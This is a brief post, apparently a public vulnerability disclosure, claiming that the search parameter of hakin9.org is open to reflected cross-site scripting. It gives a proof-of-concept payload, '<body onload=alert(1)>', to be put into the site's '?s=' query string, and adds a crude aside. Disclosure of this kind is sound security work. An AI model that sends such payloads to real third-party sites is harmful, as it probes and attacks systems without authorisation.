Hakin 9's site at hakin9.org suffers from a reflective cross site scripting vulnerability.
602acb060b692832543b8ccb757cf8167a9aa76366afe8f80834c55dd3bdc93c
So, we all remember DICKS Right?
http://hakin9.org/?s= < Try sticking <body onload=alert(1)> into there :-)